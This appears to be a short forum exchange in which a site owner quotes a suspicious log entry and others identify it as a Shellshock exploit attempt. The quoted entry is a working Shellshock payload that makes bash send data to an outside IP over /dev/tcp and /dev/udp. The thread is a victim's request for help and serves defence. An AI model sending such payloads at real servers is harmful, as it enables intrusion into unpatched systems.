On a 7.4.0 site log today I had a strange access. Does anyone know what they are trying?

The info in the Ref column:

My Url/() { :;}; /bin/bash -c "echo My Url / > /dev/tcp/213.233.161.42/23; echo My Url / > /dev/udp/213.233.161.42/80"

Ip= 213.233.161.42 is Iran, Islamic Republic Of Tehran Sharif University Of Technology

Ip=74.208.111.148 United States Chesterbrook 1&1 Internet Inc.

most likely they tried a PHP hack.

it's an attempt to exploit the shellshock bug http://en.wikipedia.org/wiki/Shellshock_(software_bug) -this only affects unix/Linux
